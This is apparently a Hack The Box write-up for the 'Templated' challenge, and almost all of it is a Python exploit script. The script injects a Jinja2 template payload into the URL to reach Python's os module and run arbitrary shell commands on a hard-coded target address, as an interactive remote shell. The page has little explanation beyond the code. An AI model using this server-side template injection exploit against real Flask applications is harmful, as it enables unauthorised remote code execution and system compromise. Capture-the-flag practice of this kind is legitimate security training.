Templated

flask, RCE, XSS, Jinja2

Templated — Hack The Box Technical Write-upMedium

HTB Writeup — TemplatedMedium

exploit script

import requests
import re

url = "http://178.128.45.143:32008/"

while True:
    cmd = input(" $ ")
    r = requests.get(url + "{{request.application.__globals__.__builtins__.__import__('os').popen('" + cmd + "').read()}}")
    text = r.text
    output = re.findall("<str>(.*?)</str>", text, re.DOTALL)
    if (len(output) > 0):
        print(output[0])